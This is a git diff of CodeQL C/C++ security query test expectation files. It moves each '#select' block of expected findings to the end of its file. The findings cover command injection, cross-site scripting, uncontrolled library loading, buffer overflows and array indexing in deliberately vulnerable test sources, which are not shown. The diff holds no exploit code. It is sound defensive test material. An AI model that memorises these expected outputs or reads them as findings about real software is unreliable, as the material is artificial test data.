| test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | +| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected index be2a5f70bccd..4f31dd3e17bf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected @@ -1,7 +1,3 @@ -#select -| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | edges | search.c:14:24:14:28 | *query | search.c:17:8:17:12 | *query | provenance | | | search.c:22:24:22:28 | *query | search.c:23:39:23:43 | *query | provenance | | 
@@ -26,3 +22,7 @@ nodes | search.c:73:17:73:25 | *raw_query | semmle.label | *raw_query | | search.c:77:17:77:25 | *raw_query | semmle.label | *raw_query | subpaths +#select +| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index 999c7f5240df..f328113106e4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | edges | test.cpp:37:73:37:76 | *data | test.cpp:43:32:43:35 | *data | provenance | | | test.cpp:64:30:64:35 | *call to getenv | test.cpp:64:30:64:35 | *call to getenv | provenance | | 
@@ -12,3 +10,5 @@ nodes | test.cpp:64:30:64:35 | *call to getenv | semmle.label | *call to getenv | | test.cpp:73:24:73:27 | *data | semmle.label | *data | subpaths +#select +| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index c7cc621e4b3a..ca24075c2c34 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected 
@@ -1,14 +1,3 @@ -#select -| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | -| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | -| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. 
| test.cpp:76:12:76:17 | fgets output argument | string read by fgets | -| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | -| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | -| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | edges | test.cpp:24:30:24:36 | *command | test.cpp:26:10:26:16 | *command | provenance | | | test.cpp:29:30:29:36 | *command | test.cpp:31:10:31:16 | *command | provenance | | 
@@ -51,3 +40,14 @@ nodes | test.cpp:113:8:113:12 | *call to fgets | semmle.label | *call to fgets | | test.cpp:114:9:114:11 | *ptr | semmle.label | *ptr | subpaths +#select +| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | +| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | +| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. 
| test.cpp:76:12:76:17 | fgets output argument | string read by fgets | +| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | +| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | +| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected index b81401816205..3a2b7372831d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected 
@@ -1,19 +1,3 @@ -#select -| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | -| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | -| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | -| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | -| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | -| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | -| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | -| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | -| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. 
| test.cpp:195:22:195:27 | string | string | -| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | -| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | -| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | -| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | -| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | -| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | edges | test.cpp:16:11:16:21 | **mk_string_t [string] | test.cpp:39:21:39:31 | *call to mk_string_t [string] | provenance | | | test.cpp:18:5:18:7 | *str [post update] [string] | test.cpp:19:5:19:7 | *str [string] | provenance | | 
@@ -124,3 +108,19 @@ nodes subpaths | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [Return] [string] | test.cpp:242:16:242:19 | set_string output argument [string] | | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [string] | test.cpp:242:16:242:19 | set_string output argument [string] | +#select +| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | +| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | +| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | +| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | +| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | +| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | +| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | +| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. 
| test.cpp:187:22:187:27 | string | string | +| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | +| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | +| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | +| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | +| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | +| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | +| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected index 142a9b4c59e5..d91379737073 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected @@ -1,8 +1,3 @@ -#select -| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:7:33:7:36 | **argv | overflowdestination.cpp:23:45:23:48 | **argv | provenance | | 
@@ -39,3 +34,8 @@ nodes | overflowdestination.cpp:76:30:76:32 | *src | semmle.label | *src | subpaths | overflowdestination.cpp:75:30:75:32 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:75:30:75:32 | overflowdest_test2 output argument | +#select +| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected index af3fa1ab7cf6..5c10f6e059d1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected 
@@ -1,6 +1,3 @@ -#select -| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | -| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:6:27:6:30 | **argv | main.cpp:8:34:8:37 | **argv | provenance | | @@ -99,3 +96,6 @@ subpaths | main.cpp:8:34:8:37 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | main.cpp:8:34:8:37 | test_buffer_overrun_main output argument | | main.cpp:9:29:9:32 | **argv | tests_restrict.c:15:41:15:44 | **argv | tests_restrict.c:15:41:15:44 | **argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | | main.cpp:9:29:9:32 | *argv | tests_restrict.c:15:41:15:44 | *argv | tests_restrict.c:15:41:15:44 | *argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | +#select +| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | +| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected index b4834cc6dc70..0ebcbb8cde4e 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected @@ -1,9 +1,3 @@ -#select -| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | -| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | -| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | edges | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | provenance | | | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | provenance | | 
@@ -16,3 +10,9 @@ nodes | tests.c:33:21:33:29 | scanf output argument | semmle.label | scanf output argument | | tests.c:34:10:34:16 | *access to array | semmle.label | *access to array | subpaths +#select +| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | +| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | +| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 21a50d0a8fa1..1fb824b35d6e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,5 +1,3 @@ -#select -| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | edges | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | provenance | TaintFunction | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | provenance | | @@ -8,3 +6,5 @@ nodes | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | semmle.label | ... = ... | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | semmle.label | data | subpaths +#select +| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 3377b266d0a2..184af69e72c4 100644 
